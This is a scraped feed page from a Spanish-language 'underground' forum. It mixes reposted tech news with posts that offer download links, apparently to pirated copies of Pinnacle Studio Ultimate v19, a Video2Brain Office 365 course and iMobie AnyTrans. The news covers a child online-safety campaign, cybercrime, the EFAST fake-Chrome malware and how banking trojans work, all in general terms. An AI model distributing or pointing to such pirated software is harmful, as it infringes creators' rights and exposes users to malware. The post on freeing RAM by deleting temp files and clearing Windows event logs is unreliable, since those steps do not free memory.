Quantcast
Channel: Comunidad Underground Hispana
Viewing all 11602 articles
Browse latest View live

Pinnacle Studio Ultimate v19.0.2

$
0
0


Pinnacle Studio Ultimate v19.0.2
[ RAR | Install | Win: 7/8/8.1 | 2,89 GB; 2,92 GB ]

Descripción:

El software de Ultimate de edición de vídeo. Sus películas se vean lo mejor desde todos los ángulos con el poder de Pinnacle Studio 19 Ultimate y su nuevo Editor de Multi-Cámara. Ver y editar material de archivo de hasta 6 cámaras, y alinear los clips de forma automática con sincronización de audio. Fácilmente menor sonido de fondo para mantener el diálogo y la narración clara con una nueva atenuación de audio.
Tome en cualquier proyecto de edición con confianza gracias a la velocidad de 64 bits, la edición con precisión de cuadro ilimitada-pista en 4K, HD y 3D, y la amplia compatibilidad de formatos, incluyendo nueva decodificación XAVC, decodificación DVCPRO HD y soporte VFR y MXF. Con más de 2.000 efectos, transiciones y títulos, y NewBlue Video Essentials IV, sus películas se verá impresionante donde quiera compartirlos-línea, en los dispositivos o en el disco.


Características:

¡Nuevo! Edición multicámara
¡Nuevo! Audio Esquivar equilibra sonido de diálogo y el fondo
¡Nuevo! Optimizado para la sexta generación del procesador de Intel
¡Nuevo! Efectos premium de NewBlue
Mejorado! Captura de pantalla en vivo
4K Ultra HD, incluido el apoyo XAVC S
Más de 2.000 efectos, transiciones y plantillas
Edición con precisión de cuadro Unlimited-track
iZotope Música y Speech Cleaner

Multilenguaje Incluye Español

Pinnacle Studio Ultimate v19.0.2
[ RAR | Install | Win: 7/8/8.1 | 2,89 GB; 2,92 GB ]




**Uploaded:

x86:

http://ul.to/t4mhzmmq
http://ul.to/miegvd8p
http://ul.to/87ou04wy
http://ul.to/dvx4utgk
http://ul.to/xaj2z9oe

x64:

http://ul.to/0ib2l453
http://ul.to/huh528dd
http://ul.to/5mxy65zh
http://ul.to/gzn7lyu4
http://ul.to/si4qetd0

**Rockfile:

x86:

http://rockfile.eu/b620pqsnih76.html
http://rockfile.eu/4lw478ckhvbg.html
http://rockfile.eu/0wfpcwvhp36o.html
http://rockfile.eu/i2lfj4zip7ec.html
http://rockfile.eu/lohywz4cmhv2.html

x64:

http://rockfile.eu/fpkhdi3n1rb7.html
http://rockfile.eu/atfmqvfnzvt3.html
http://rockfile.eu/a5t675j9ad7m.html
http://rockfile.eu/b3jhx5k03kaf.html
http://rockfile.eu/d9qnyb7wnyw5.html

**Faststore:

x86:

http://faststore.org/9q0dd4l3aqdo
http://faststore.org/jrauhy36oavx
http://faststore.org/7a3s3lb7tpn5
http://faststore.org/dejkmsg6re96
http://faststore.org/z30rwrrk8r7d

x64:

http://faststore.org/3792v4n2o5rt
http://faststore.org/gkgq38efgnil
http://faststore.org/y2tiyl6m8los
http://faststore.org/9z79u517nlyz
http://faststore.org/axrt1y2almk9

Respaldo de los Archivos aca:


...Una Hora Me Tardo en Subir 1 Archivo, Menos de 1 Minuto Te Toma Dejar 1 Comentario...
...Comenta, Asi Apoyas a Seguir Subiendo Material Para Ti...

Video2Brain - Office 365 [2015]

$
0
0
Video2Brain: Office 365 [2015][Español]
.

.
Office 365 es el servicio de suscripción de Microsoft que incluye las aplicaciones de Office que ya conoces: Word, Excel, PowerPoint, OneNote y Outlook para Windows y para Mac, las apps de Office para iOS y Android, así como los servicios en la nube de Microsoft y Office Online para editar, compartir y almacenar documentos. Aprende a usarlos, descubre sus ventajas y descubre cómo puede aumentar tu productividad, tanto si estás casa, en la oficina o si trabajas en un equipo de sobremesa o portátil, en un dispositivo o a través de la web
.
Incluye las últimas versiones de las aplicaciones de Office que conoces y en las que confías: Word, Excel, PowerPoint, OneNote y Outlook para Windows y para Mac, las apps de Office para iOS y Android, así como los servicios en la nube de Microsoft y Office Online para editar, compartir y almacenar documentos y archivos.
.
En este curso te mostraré cuáles son las ventajas y modalidades de este nuevo servicio. Juntos revisaremos cómo puedes instalar y compartir tu suscripción en otros equipos y agregar personas a ella para que puedas trabajar y estar conectado en todo momento y desde cualquier lugar.
.
Cubriremos también cuáles son los modelos de suscripción de Office 365 y cuáles son sus diferencias para que puedas elegir la que más te convenga de acuerdo a tus necesidades de trabajo. Revisaremos los programas y servicios de colaboración que vienen incluidos en la suscripción para pequeñas empresas como SharePoint y Yammer, además del sistema para llamadas telefónicas y videoconferencia de Skype para empresas
.
.
Encriptador Omaredomex
Encriptador Omaredomex
Encriptador Omaredomex

Campaña de sensibilización al menor sobre el buen uso de las redes sociales

$
0
0
Facebook y Google, junto con salas de cines y Metro de Madrid, colaborarán en la difusión de una campaña audiovisual que tiene por objetivo concienciar a los más pequeños sobre la necesidad de que introduzcan algunos hábitos de seguridad en la red.
.
Esta campaña audiovisual de sensibilización se ha anunciado durante la presentación del informe de la Subcomisión de Estudio sobre las redes sociales constituida en la Comisión de Interior del Congreso de los Diputados. Está formada por cuatro vídeos con consejos para los menores sobre el buen uso de las redes sociales, que serán proyectados en cines, en el Metro de Madrid y a través de Facebook y Google.
.
La campaña se llevará a cabo en un contexto en el que los delitos offline caen un 5 por ciento, mientras que los que se cometen en Internet aumentan un 200 por cien.
.
El informe, presentado en el Ministerio de Industria, Energía y Turismo, emite una serie de recomendaciones en el ámbito de la Seguridad TIC y los Menores, que van desde una mayor coordinación entre administraciones hasta programas concretos de alfabetización digital pasando por proyectos tecnológicos relacionados con el etiquetado inteligente de contenidos digitales.
.
Este análisis aconseja cuidar la identidad digital, no compartir contraseñas o fotografías, así como vigilar las webcams y no contactar en la vida real con desconocidos que proceden del mundo virtual.
.
.
Fuente:
pcworld.es

¿ Eres un ciberdelincuente ?

$
0
0
De la mano del perito informático Carlos Aldama, repasamos una serie de acciones normales que son delitos digitales. No todos los ciberdelitos que se cometen son obvios, así que conviene saber qué tipo de acciones pueden conducirnos a un problema legal.

Todos tenemos claro que la estafa, el robo confidencial de información, la manipulación de equipos y redes sociales o chantaje a través de cibersexo son delitos informáticos. Sin embargo, por su trabajo diario como perito y director de Aldama
Informática, Carlos Aldama es consciente de que hay una serie de delitos que presentan una mayor probabilidad de puedan comenterse sin que el usuario se dé cuenta y que son fácilmente rastreables.
.
Éstos son algunos de ellos:
• Espiar el móvil de tu pareja o de terceras personas: muchas personas ‘cotillean’ los mails, WhatsApp o SMS de terceras personas y esto atenta contra el secreto de las comunicaciones y la intimidad. Esto, que es tan cotidiano, “si además se usa para algún fin, puede acabar con penas de prisión, como muestra una reciente sentencia que condena a más de un año de prisión a una persona por espiar el WhatsApp de su pareja”, señala Aldama.
.
• Hacerse pasar por otro: algo que puede ser totalmente inocente e incluso una broma, como hacerse pasar por otro en redes sociales, chats o llamadas, puede conllevar problemas. Es cierto que, por lo general, se considera delito cuando se busca aprovecharte de la suplantación. Sin embargo, si quieres evitar problemas, mejor pensárselo dos veces y no hacerlo. El experto explica que “hemos tenido peritajes informáticos sobre suplantación de identidad para difamación ante grupos de conocidos y un largo etcétera que son delitos importantes y que muchas veces la persona que los comete no tiene idea de su gravedad”.
.
• Amenazas en redes sociales: si has sentido alguna vez el impulso de insultar (o incluso amenazar) a través de las redes sociales, ya sea a políticos, artistas o cualquier otra persona, no lo hagas. Puede acarrear grandes problemas ante la justicia.

• Revelar secretos: publicar un secreto o intimidad de una persona a través de las redes sociales o por mensajes, aunque sea un amigo, se puede considerar un delito si no existe consentimiento.
.
• Acoso: Aldama advierte también de que la línea entre lo que se considera acoso y lo que no, es muy delgada y “totalmente subjetiva”. Así, lo que para uno puede ser un claro ejemplo de acoso sexual, para otro puede ser una ‘persecución’ amorosa totalmente inocente. Por todo esto, es un tema muy a tener en cuenta a la hora de enviar mensajes, ya que en una u otra interpretación, puede derivar un delito informático.
.
• Grabar sin consentimiento: casos como grabar a tu pareja siéndote infiel, filmar escenas de cibersexo o guardar fotos íntimas, todo esto sin consentimiento, son considerados delitos que pueden incurrir en multas o incluso penas de cárcel.
.
• Contenido pedófilo: uno de los delitos más graves que se pueden cometer sin darse cuenta es descargar material de internet y que dentro haya contenido pedófilo. Este es un caso muy grave que en la mayoría de los casos, el usuario no tiene conocimiento de que está almacenando o distribuyendo algo completamente ilegal. Ante esto, el peritaje informático puede demostrar si los documentos han sido visionados y especialmente si se tenía conocimiento de su existencia.
.
“La mejor recomendación es tener sentido común y extremar las precauciones para no cometer alguno de estos delitos, que aunque se hagan sin intenciones maliciosas o incluso a modo de broma, pueden suponer un problema importante”, concluye este perito informático, cuyo trabajo en investigar las pruebas de un delito en el que las principales evidencias están relacionadas con las nuevas tecnologías.
.
.
Fuente:
pcworld.es

¿ Cómo deben enfocar las empresas su estrategia de seguridad ?

$
0
0
Los ciberdelincuentes están atacando los sistemas informáticos de las empresas con aparente impunidad, según RSA. La firma sostiene que un enfoque de seguridad basado en inteligencia es la única estrategia eficaz para combatir el cibercrimen y ofrece unos consejos sobre cómo conseguir un enfoque de seguridad correcto.
.
Según RSA, las empresas deben poner esfuerzos en mejorar la planificación estratégica y las respuestas tácticas a los ataques cibernéticos y, en este sentido, ofrece los siguientes consejos:

1. Vigilancia permanente. Las ciberguerras de hoy son dinámicas. La vigilancia y la preparación deben formar parte de cualquier plan de seguridad de la información. El control de acceso no es suficiente para protegerse contra los ataques rápidos y cada vez más frecuentes. Conviene implementar actividades de evaluación y monitoreo constantes de la vulnerabilidad y establecer un plan de respuesta integral que incorpore a las personas, los procesos y la tecnología, y evaluarlo periódicamente.
.
2. Establecer prioridades. Dado que no todos los recursos de información e infraestructura son iguales, conviene decidir cuáles son de misión crítica y cuáles son fundamentales para el negocio. Hay que identificar los sistemas que no se deben vulnerar ni desactivar por ningún motivo ni bajo ninguna circunstancia, como es el caso de los sistemas de procesamiento de transacciones y la red eléctrica de respaldo de un centro médico.
.
3. Adaptación a los cambios en la infraestructura de TI. La infraestructura moderna de TI está siendo el escenario de muchos cambios como son el cloud computing, los modelos definidos por software o las TI como servicio, y los profesionales de seguridad deben entenderlos, adoptarlos y protegerlos con nuevas estrategias y planes de seguridad adecuados a los desafíos de seguridad que presentan.
.
4. Eliminar los puntos ciegos. En el ámbito de la seguridad, la prevención da paso a la detección. La visibilidad granular es primordial para detectar y detener las amenazas modernas. La seguridad perimetral y el uso de antivirus no es suficiente. Conviene implementar procesos y talento que permitan visibilizar toda la red y también el host.
.
5. Adaptarse a las nuevas modalidades de trabajo. Las nuevas formas de trabajar como el teletrabajo o la proliferación de dispositivos móviles y de BYOD hacen necesario el diseño de políticas, métodos y un programa de formación para que los trabajadores conozcan los protocolos de seguridad y las implicaciones de estos nuevos dispositivos.
.
.
Fuente:
pcworld.es

Cómo liberar memoria RAM en Windows 7

$
0
0
En caso de que desees mejorar el rendimiento de tu PC para que trabaje más rápido, puedes liberar memoria RAM. Existen diversas soluciones en la web para lograrlo, pero puedes hacerlo sin descargar programas en Windows 7.

Cómo recuperar memoria RAM en Windows 7

Ve al menú de Inicio, escribe %temp% y presiona Enter. Selecciona todas las carpetas y los archivos que aparezcan y bórralos. Luego, ve al Panel de control > Herramientas administrativas > Visor de eventos. Haz clic en Registros de Windows, dale clic derecho en Aplicación y selecciona Vaciar registro:
.

.
Haz lo mismo con las fichas Seguridad, Instalación, Sistema y Eventos reenviados
.
.
Fuente:
es.ccm.net

Raros proyectos para ofrecer Wifi en la calle

$
0
0
Con el tiempo han ido surgiendo nuevas iniciativas y proyectos que tienen como objetivo ofrecer Internet en cualquier parte a través de conexión inalámbrica. Algunos de estos proyectos Wi-Fi son realmente curiosos como usar a los “sin techo” como punto inalámbrico o convertir las cabinas en un hotspot para acceder a la red desde el teléfono móvil. Vamos a hacer un repaso algunos de los proyectos más llamativos y polémicos al respecto.
.
Red Wi-Fi de indigentes

En Austin, Estados Unidos ya se llevó a cabo una iniciativa de este estilo entre los vagabundos usados como puntos Wi-Fi callejeros. Pero el proyecto “Red viva de Wi-Fi” surgido en Praga recientemente ha traído esta idea a Europa. Con ella se usa a personas sin hogar como routers mediante los cuales los turistas que visiten la capital de la República Checa podrán conectarse a Internet si entran dentro del alcance de 20 metros o incluso cargar el smartphone. La idea parte de una asociación benéfica que a cambio de este servicio pagará el alojamiento de estas personas en albergues y residencias y dará ropa y comida a las mismas.
.
Pavimento Wi-Fi de alta velocidad

Reino Unido ha comenzado un programa piloto para instalar cajas de registro bajo la calzada y permitir a los ciudadanos que transiten por las calles poder acceder a una red Wi-Fi de alta velocidad. De hecho el proyecto contempla una velocidad de conexión de 166 Mbps y será de acceso libre y gratuito tanto para los vecinos de High Street en Chesham como para los negocios y visitantes de la zona.
.
Las cabinas Wi-Fi de Nueva York

Los smartphones y la tecnología móvil han convertido a las cabinas telefónicas en prácticamente una pieza de museo, pero en Nueva York se les ha buscado una nueva utilidad. El proyecto LinkNYC planteaba convertir las cabinas de la “gran manzana” en puntos Wi-Fi gratuitos con un radio de alcance de 50 metros y velocidades de hasta 1,3 Gbps. Debido a la cantidad de turistas que visitan Nueva York cada día, el proyecto se ha convertido en uno de los más ambiciosos al respecto.
.
Shadow Wi-Fi

Para concienciar a las personas de los efectos nocivos del sol sobre nuestra piel, el proyecto Shadow Wi-Fi llegó a las playas de Perú en forma de parasol gigante que ofrecía conexión inalámbrica a los que se cobijaran tras esta pared. Lo llamativo de este proyecto es que incluye un sensor para detectar la ubicación del sol y dirigir la antena Wi-Fi de forma que solamente sea posible conectarse si nos posicionamos en la sombra.
.
.
Fuente:
adslzone.net

iMobie AnyTrans v4.7.3 Build 20151017

$
0
0
Para darle el mejor iPhone, la experiencia de gestión de música iPod es lo que los nuevos AnyTrans hechos para. Diseño ultra-moderno, música super-rápida velocidad de transferencia, junto con las características del hecho de sólo-para-apple-dispositivos, AnyTrans abre un camino completamente nuevo para administrar su biblioteca de música iPhone, iPad, iPod e iTunes
.

.
iWizard es una característica única de iMobie productos Pro, lo que hace que la gestión de su contenido de iPhone, iPad y iPod muy fácil.
.
A través del asistente intuitivo, usted puede copias de seguridad de música y películas desde dispositivos de Apple a la biblioteca de iTunes o en una carpeta en su computadora. Para asegurar su iTunes pueden ser perfectamente restaurados, iWizard guarda todos sus datos personales, tales como calificaciones, número de reproducciones, etiquetas y obras de arte.
.
AnyTrans es capaz de importar iPod música de varias bibliotecas de iTunes almacenados en equipos diferentes. Usted no tiene que preocuparse de perder canciones existentes AnyTrans simplemente añade nuevas canciones a sus iDevices
.
.
Encriptador Omaredomex

Apps Que provocan que Android funcione mal

$
0
0
Hoy en día en el mercado de los dispositivos móviles podemos encontrar todo tipo de smartphones o tablets que cuentan con distinto hardware y que ofrecen un rendimiento y experiencia de usuario muy diferentes. Podemos encontrar desde el móvil más básico hasta pequeños ordenadores de bolsillo que cuentan con tecnologías y hardware más punteros, eso sí a un precio mucho más elevado.
.
Pero incluso si nos hacemos con ese móvil o tablet de última generación, en la gran mayoría de ocasiones vemos como poco a poco el rendimiento del dispositivo va disminuyendo y no responde como el primer día que lo compramos. Problemas como el consumo excesivo de memoria RAM, exigir demasiado a la CPU o acabar con la mayoría del espacio de almacenamiento interno, pueden provocar que la batería del terminal ofrezca una menor autonomía y que el rendimiento inferior a lo que esperamos.
.

.
La firma de seguridad AVG, acaba de revelar en un informe sobre el segundo trimestre de este año, las aplicaciones que más culpa tienen de que nuestros dispositivos con sistema operativo de Google tengan un peor rendimiento y la verdad es que los resultados sorprenden. En el número uno del ranking se puede ver a Snapchat, que logra incluso desplazar a Facebook como el máximo responsable de reducir el rendimiento de nuestros dispositivos Android.
.
Recordemos que Snapchat es una aplicación que permite a los usuarios tomar fotografías, grabar vídeos, añadir textos y dibujos y enviarlos a una lista de contactos limitada. Estos vídeos y fotografías se conocen como Snaps y los usuarios pueden controlar el tiempo durante el que estos serán visibles (de 1 a 10 segundos de duración), tiempo después del cual desaparecerán de la pantalla del destinatario y serán borrados del servidor de Snapchat. Esto significa que el uso simultáneo de la cámara para realizar fotos o vídeos junto con la conexión de datos o WiFi y el GPS, tiene unos efectos sobre nuestros dispositivos que son de larga duración.
.
Otras de las aplicaciones que tampoco era de esperar ver en la parte alta de ranking es Tumblr, pero según la propia AVG, la plataforma de microblogging realiza un consumo de datos muy elevado, mayor incluso que si combinamos el uso de Netflix y Spotify, aunque la compañía de seguridad no da detalles de por qué la red social incurre en este gasto excesivo de datos.
.
Aunque los datos revelados por AVG pueden resultar algo desconcertantes, lo que la compañía de seguridad trata es, lejos de asustar a los usuarios, informarles de aquellas aplicaciones que de alguna manera deberíamos evitar tener instalada y hacer uso de ellas en nuestros dispositivos si no queremos ver como el rendimiento de ellos baja considerablemente. Según el propio informe, también hay que ser cuidadosos con el uso de otras aplicaciones como Words with friends, el navegador Chrome y como no Facebook, Por desgracia, podemos ver como algunas de las aplicaciones más usadas a diario por una gran parte de los usuarios Android están en el top 10 de las que debemos evitar por el consumo de recursos y la baja de rendimiento que causan en nuestros smartphones y tablets.
.
.
Fuente:
Roberto Adeva
adslzone.net

Limpiador De Google para Chrome - Herramienta Gratuita

$
0
0
Mantener nuestro ordenador libre de amenazas de seguridad y virus se vuelve cada vez más complicado debido a las numerosas puertas por las que sin saberlo, podemos permitir que se cuele todo tipo de malware en el equipo. Muchas veces no hace falta ni que sean virus y simplemente por problemas de compatibilidad podemos notar una pérdida de rendimiento en el equipo debido a alguna extensión o programa instalado. Por suerte, cada vez son más las aplicaciones y herramientas que nos ayudan a optimizar nuestro sistema y uno de estos ejemplos viene de la mano de Google con la herramienta Limpiador de Chrome, limpiaremos el navegador de todo aquel software que dé problemas.
.
Google ha lanzado esta herramienta gratuita disponible de momento solo para Windows, que se puede descargar desde el enlace de abajo y su funcionamiento es muy simple. Siguiendo con el carácter universal y útil para el usuario que siempre tratar de seguir la compañía de Mountain View, una vez que se haya descargado en nuestro equipo el Limpiador de Chrome solo tenemos que ir a la ubicación donde se almacene el archivo ejecutable e iniciar el mismo.
.
Limpiador de Chrome basa su utilidad en la simplicidad

De manera automática, el Limpiador de Chrome buscará todos aquellos programas que supongan una merma de rendimiento para Google Chrome y mediante un aviso nos mostrará aquellos encontrados que tienen un impacto negativo. Si no se han encontrado se mostrará a su vez por pantalla un mensaje indicando este mismo hecho. Antes de continuar podremos desmarcar la casilla en la que enviamos un informe sobre nuestro equipo a Google, algo que conviene tener en cuenta si queremos preservar la confidencial de nuestra actividad con el navegador.
.
Una vez concluida la búsqueda de programas que pueden ser un lastre para Google Chrome, nos competerá a nosotros valorar su eliminación o no del equipo y podremos a su vez acceder a la opción de restablecer la configuración inicial del navegador Google Chrome con vistas a mejorar la experiencia de uso
.
Google quiere que su navegador siga siendo la opción preferida por el gran grueso de usuarios de Internet, demostrando con herramientas como el Limpiador de Chrome que se ha tomado en serio la competencia de nuevas apuestas como Edge de Microsoft y la lucha que mantiene con Mozilla Firefox, Safari, Opera e Internet Explorer.
.
DESCARGA: https://www.google.com/chrome/cleanup-tool/

Fuente:
David Valero
adslzone.net
.

Google abrirá resultados de búsquedas en Safari directamente en aplicaciones iOS

$
0
0
De vez en cuando Google nos sorprende con alguna que otra iniciativa que «se saca de la chistera» por medio de la cual, al contrario de lo que se podría pensar, también quiere hacer la vida más fácil a los usuarios de otras plataformas que son competencia de su sistema Android, tal y como ocurre en el caso del que os vamos a hablar.
.
Aunque por el momento aún no tengáis la opción disponible en vuestro navegador Safari instalado en dispositivos móviles, tal y como nos indican los compañeros de Movilzona, a finales de este mes podremos abrir los resultados de las búsquedas directamente en las app de iOS. Por lo tanto, cada vez que realicemos alguna búsqueda en el mencionado navegador a través de Google, aparecerá un listado con los habituales resultados de la misma, aunque en la parte superior, en el caso de que sea posible, aparecerán aquellos enlaces que pueden abrirse con alguna de las aplicaciones iOS que tengamos instaladas en nuestro terminal.
.
Los ingenieros de Google suponemos que ya están finalizando el desarrollo de esta nueva alternativa para tenerla lista a lo largo del presente mes de octubre y de la que se beneficiarán los usuarios de iOS a la hora de realizar consultas en el buscador. Por ello de momento estos ingenieros ya han comunicado a los desarrolladores encargados de generar esos links a sus aplicaciones de iOS a través del SDK de Google.
.
Como algunos de vosotros ya habréis pensado, esta era una opción que ya estaba disponible con anterioridad en los dispositivos de Apple, eso sí, siempre y cuando se utilizase el navegador Google Chrome. En el caso de que se intentase llevar a cabo esta misma acción con Safari, hasta el momento en la mayoría de las ocasiones no funcionaría, algo que la compañía de Mountain View está intentando subsanar. Eso sí, como no podía ser de otro modo, para que esta función no dé problema alguno, será imprescindible que bien el iPhone o el iPad donde realicemos las búsquedas estén actualizados a iOS 9.
.
Todo esto se lleva a cabo con el fin de que los usuarios más afines a los productos tanto de software como de hardware de la compañía de la manzana mordida, tengan a su disposición la mayoría de las funciones del buscador de las que disfrutan los usuarios de los dispositivos basados en Android.
.
.
Fuente:
David Onieva
adslzone.net

Segun Kaspersky Lab Usar tanto Google nos hace más tontos

$
0
0
La llegada de los smartphones a nuestras vidas ha hecho que nuestros hábitos y comportamientos hayan cambiado, y es que en nuestros bolsillos contamos con pequeños ordenadores que nos pueden ayudar casi ante cualquier situación. Es posible que nos guíen para llegar a algún sitio, decirnos rápidamente el teléfono de un determinado establecimiento, darnos el significado de cualquier palabra o expresión, información sobre enfermedades u ofrecernos las mejores ofertas de aquello que queremos comprar entre otras muchas utilidades.
.
Para todo esto, casi siempre hacemos uso de los distintos buscadores que tenemos disponibles en Internet, especialmente de Google. Pues bien, un reciente estudio realizado por la firma de ciberseguridad Kaspersky Lab acaba de mostrar que el uso frecuente de los motores de búsquedas como Google para encontrar respuestas a todo lo que se nos plantea a diario, está haciendo que nuestra capacidad para recordar se esté debilitando y perdiendo.
.

.
Según el estudio realizado, el 36% de los encuestados afirmaron que antes de tratar de recordar cualquier cosa, buscan una respuesta rápida a través de Google u otros buscadores. Un 24% también admitieron que olvidan la información buscada en la red poco tiempo después de usar este método de búsqueda. Estas estadísticas se han obtenido como resultado de encuestar a un total de 6.000 personas entre hombres y mujeres mayores de 16 años en el Reino Unido, Francia, Alemania, Italia, España y Benelux a principios de este mismo año.
.
Esto no hace otra cosa que llegar a la conclusión de que la tecnología está impactando seriamente sobre nuestros recuerdos, ya que lejos de tratar de recordar estamos haciendo uso de los motores de búsquedas, sobre todo desde nuestros smartphones, para que sean ellos los que nos den una respuesta rápida y cómoda sin tener que realizar el esfuerzo de recordar por nosotros mismos.
.
Según ha afirmado la doctora María Winber de la Universidad de la Escuela de Psicología de Birminghan, el uso de este tipo de prácticas “nos hace pensadores superficiales”, puesto que repetir pasivamente la información buscada a través de los buscadores no crea un sólido y duradero recuerdo en nuestra memoria.
.
Por lo tanto, sin darnos cuenta estamos perdiendo nuestra capacidad de recordar hasta el punto que, como se muestra en el estudio, la gran mayoría de los padres encuestados eran incapaces de marcar el número de teléfono del colegio de sus hijos sin tener que mirar en el móvil o incluso recordar el número de móvil de sus familiares más cercanos sin tener que mirar en la agenda.
.
.
Fuente:
Roberto Adeva
adslzone.net

EFAST: El software malicioso que simula a Chrome

$
0
0
Se acaba de descubrir un nuevo software malicioso llamado EFAST que, al menos en un principio, funciona de un modo muy similar a otros tipos de malware que llevamos viendo hace ya muchos años, aunque en este caso va un paso más allá.
.
Su método de funcionamiento y posterior infección del equipo se basa en el lanzamiento de pop-ups y pop-under en modo de anuncios que aparecen en pantalla a medida que navegamos por la Red. De este modo y en el caso de que pinchemos sobre los mismos, nos van redirigiendo hacia otros sitios web con más malware y, por supuesto, el propio software malicioso va realizando un seguimiento de nuestros movimientos en Internet para cada vez ir enviándonos más y más anuncios secuestrando de algún modo nuestro navegador.
.
Esto es algo que ya llevamos sufriendo mucho tiempo, sin embargo la novedad de este nuevo malware estriba en que en realidad su objetivo prioritario no es secuestrar nuestro navegador como hemos comentado anteriormente, sino que lo que intenta es sustituirlo en su totalidad. Por lo tanto lo que EFAST intenta es eliminar Chrome de nuestro ordenador y tomar su lugar, así se hace con el control de una gran cantidad de enlaces y archivos asociados al mismo.
.
Hay que tener en cuenta que tanto su icono como la ventana de navegación son muy parecidos al Chrome original. Esto se debe a que EFAST se basa en el proyecto de código abierto Chromium, por lo que actúa en lo que se refiere a muchas funciones como el mismo Chrome. El software viene de una compañía que se autodenomina Clara Labs y que en realidad está detrás de una gran cantidad de navegadores similares con nombres como BoBrowser, Tortuga o Unico.
.
Lo llamativo de este software es que en realidad es más sencillo para el malware en cuestión tratar de sustituir en su totalidad al navegador que usamos que infectarlo. Por lo tanto EFAST lo que en realidad está intentando conseguir es que nuestro ordenador se convierta en una madriguera de software malicioso donde los instaladores de software libre de fuentes dudosas en Internet tengan su campo de cultivo. Sin embargo no todo iban a ser malas noticias, ya que por suerte, mientras que eliminar el «secuestro» de un navegador en ocasiones es una tarea harto complicada, en el caso de ser atacados por EFATS, la eliminación del navegador malicioso debería ser relativamente fácil.
.
.
Fuente:
David Onieva
adslzone.net

Cómo programar el envío de mensajes automático en WhatsApp

$
0
0
WhatsApp ha cambiado por completo la forma de comunicarnos con nuestros amigos o familiares siendo en la mayoría de ocasiones la primera opción que la mayor parte de usuarios elige para contactar con alguno de sus contactos. Atrás quedaron los SMS, las cortas llamadas telefónicas o la expresión “te dejo una llamada perdida”.
.
WhatsApp nos permite enviar todos los mensajes de texto que queramos junto con la posibilidad de compartir fotos, vídeos, enlaces o realizar llamadas de voz. Además, la aplicación de mensajería ofrece la posibilidad de contactar de forma rápida y sencilla con un grupo de personas a la vez, algo casi impensable hace unos años ya que esto supondría tener que enviar muchos SMS o tener que realizar un montón de llamadas.


.
Ahora, gracias a los grupos de WhatsApp, podemos hacer llegar casi cualquier cosa a un gran número de contactos fácilmente. Basta con crear un grupo, añadir todos los contactos con los que queremos contactar y comenzar a escribir los mensajes. Sin embargo, la famosa aplicación propiedad de Facebook aún no cuenta con algunas características que probablemente echemos en falta en algunas ocasiones. Sobre todo cuando tenemos que enviar un mensaje por WhatsApp en un determinado momento pero justo a esa hora estamos en una reunión de trabajo, de viaje, en el dentista o cualquier otra situación en la que no podemos manejar nuestro teléfono.
.
Pero si algo bueno tiene Android, es que muchas de las aplicaciones desarrolladas por terceros nos pueden facilitar algunas funciones dentro de una aplicación de las que ella misma no dispone. Este es el caso de Seebye Scheduler NO ROOT, una aplicación que permite programar el envío de mensajes de WhatsApp de forma automática. Por lo tanto, para comenzar a disfrutar de la opción de poder programar envíos de mensajes de WhatsApp a nuestros contactos o grupos de contactos, lo primero que se debe hacer es descargar Seebye Scheduler NO ROOT, versión para aquellos dispositivos que no estén rooteados, y que está disponible en la Play Store de forma gratuita.
.
Una vez instalada, al intentar abrirla nos dirá que es necesario hacer uso de Messenger API para que la aplicación funcione correctamente y nos llevará directamente a su descarga e instalación. Una vez con que tengamos estas dos aplicaciones instaladas en nuestros dispositivos, tendremos que proceder a activar los servicios de notificaciones y accesibilidad para que nuestro terminal pueda hacer uso de ella y podamos comenzar a utilizarla.
.
En el momento de abrir la aplicación, se puede ver una pantalla con un botón en la parte superior izquierda de color rosa con el símbolo “+”, que permitirá añadir una nueva programación para el envío automático de un mensaje desde WhatsApp. A continuación se mostrará otra ventana en la que se debe indicar un nombre que identifique el mensaje que estamos programando, el tipo de contenido (texto, imagen o sonido) y seguidamente se debe introducir el texto o archivo correspondiente.
.
Un poquito más abajo es donde se puede seleccionar el contacto o contactos a los que queremos enviar este mensaje programado y donde se puede definir el día y la hora exacta a la que queremos que se realice el envío. Para finalizar se debe pulsar sobre el botón Agregar y en ese momento el mensaje estará listo para ser enviado en el momento que hayamos indicado sin tener que mover ni un dedo
.
.
Fuente:
Roberto Adeva
adslzone.net

Cómo funciona un troyano bancario

$
0
0
G DATA Bankguard, tecnología contra el malware financiero, ha evitado pérdidas superiores a los 100 millones de euros protegiendo las compras on-line desde su implantación, asegura la firma de seguridad alemana. G DATA Bankguard se incluye desde 2011 en todas las soluciones software de la compañía y desde entonces habría frustrado 182.000 ataques.
.
Al tiempo que la banca on-line y las compras por Internet se extienden a un mayor número de usuarios, los creadores de malware ven un filón en este apartado y los expertos de G DATA esperan un incremento del número de ataques protagonizados por troyanos bancarios, según el último informe de malware de la compañía del primer semestre de 2015.
.
Cómo funciona un troyano bancario
.
Cada troyano bancario lleva grabado sus objetivo -o sus objetivos, porque pueden ser varios: bancos, instituciones financieras o proveedores de servicios de pago– en sus archivos de configuración. Una vez alcanzado el ordenador de la víctima, el troyano permanece en estado latente y solo se despierta y se pone a funcionar cuando desde el ordenador infectado se accede a alguno de esos objetivos para los que han sido diseñados.
.
Una vez en acción, se infiltran en el navegador de la víctima y son capaces de espiar y manipular los datos transferidos -credenciales, contraseñas, cantidades, cuentas de destino- desde el navegador hasta el banco de la víctima, incluso a través de comunicaciones cifradas. Protagonizan los conocidos como ataques «Man in the middle» o «Man in the Browser», una forma bastante literal de describir esa manipulación que se produce de forma totalmente inadvertida en el navegador de la víctima.
G DATA ha analizado un total de 6.115 archivos de configuración de los troyanos bancarios más populares (familias Swatbanker, Vawtrak, Tinba, ZeuS -y su variante Citadel- y Spyeye) y ha desvelado cuáles son los 20 bancos o entidades que más veces se repiten en el código maliciosos de esos más de 6.000 malwares financieros.
.
Encabeza la relación el banco estadounidense Wells Fargo, al que se dirigen el 35 por ciento de los troyanos analizados, en un listado dominado por bancos de habla inglesa (norteamericanos y británicos) y donde se “cuelan” el proveedor de servicios de pago PayPal (27%), el portal de compra venta en Internet eBay (20%) y dos de los grandes bancos españoles, BBVA (21%) y Santander (20%).
.
Cuidado con el troyano bancario
.
Todas las firmas de seguridad han alertado del incremento del troyano bancario. Ya en 2010, PandaLabs revelaba que el 61% de las nuevas amenazas creadas en el primer trimestre del año fueron troyanos bancarios.
.
En 2013, 1.400 instituciones financieras de 88 países fueron víctimas de troyanos bancarios, según informe de Symantec. El malware financiero fue la amenaza más popular de ese año. Y es que el dinero siempre es una motivación perfecta para los atacantes y los delincuentes cibernéticos que continuamente están dirigiendo sus miras a las instituciones financieras.
.
